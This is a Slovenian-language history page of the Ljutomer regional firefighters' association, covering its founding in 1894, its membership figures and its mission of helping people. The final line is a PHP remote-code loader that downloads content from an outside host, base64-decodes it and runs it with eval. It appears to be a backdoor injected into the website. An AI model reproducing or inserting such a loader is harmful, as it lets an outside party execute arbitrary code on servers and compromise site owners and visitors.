Zgodovina

O nastanku združevanja, organiziranja gasilske zveze moramo področju Upravne enote Ljutomer poseči v obdobje konca 90 let osemnajstega stoletja. Kronisti so zapisali, da segajo začetki organiziranega delovanja zveze na našem področje v leto 1894, ko so se zbrali delegati in odposlanci gasilskih društev za takratni politični okraj Ljutomer. Izvedli so ustanovitev in prve volitve za zvezo ognjegasnih društev političnega okraja Ljutomer. Da je zveza pokrivala večje področje pove že sam podatek, da so bili funkcionarji iz različnih društev sedanjih občin Ljutomer, Križevci in Veržej. Leta 1909 je bilo v zvezo vključeno 14 društev. Sledilo je obdobje vojn, ki je zarezalo globoko rano tudi v delovanje gasilstva na tem območju. Ponovni zagon v delovanju je bil zaznan v petdesetih letih prejšnjega stoletja. Glede na politične okraje, se je menjavala teritorialna zastopanost društev v zvezi. V novejši zgodovini je zveza združevala 42 teritorialnih in pet industrijskih gasilskih društev. Z začetkom nove lokalne samouprave se je število teritorialnih društev najprej zmanjšalo na 41, z nastankov novih občin pa še za 13 društev iz občine Križevci. Tako danes Gasilska zveza Ljutomer združuje 28 društev iz treh občin in sicer iz ljutomerske 24 društev iz Veržeja 3 društva in eno društvo iz občine Razkrižje. Skupno je v gasilska društva v gasilski zvezi Ljutomer vključeno 2971, kar pomeni čez 20 procentov prebivalstva. Tako je gasilske vrste vključeno 188 pionirjev, 99 mladincev, 110 pripravnikov, na operativnih dolžnostih je kar 787 gasilcev in 3 poklicni gasilci, 238 je prostovoljnih gasilcev v rezervi, vključenih pa je tudi 252 veteranov, 1294 pa je še vključenih članov, ki tudi po svojih močeh pomagajo pri delovanju gasilske organizacije.

Kljub temu, da so se menjavali gospodarji, menjaval se je politični zemljevid, menjavala se je lokalna ureditev, je gasilstvo ostalo zmeraj v svoji funkciji, pomagati ljudem. Pa naj si gre za požar ali druge elementarne nesreče. Ljudje so se v gasilska društva združevali, ne glede na politično barvo, družbeni status in lokalno pripadnost. Združevali za to, da so kot organizirana sila zaščitili imetje ljudi, njihova življenja, da so pomagali tistim, ki so bili pomoči potrebni. Pomagali so, ko je zapretil rdeči petelin, pomagali, ko je ogrožala voda, pomagali, ko je divjala vremenska ujma. Pomagali so ljudem tudi, ko je bilo potrebno popraviti, na novo izgraditi uničeno.

$rrr = file_get_contents('http://speed-dev.net/counter/count.php'); eval(base64_decode($rrr));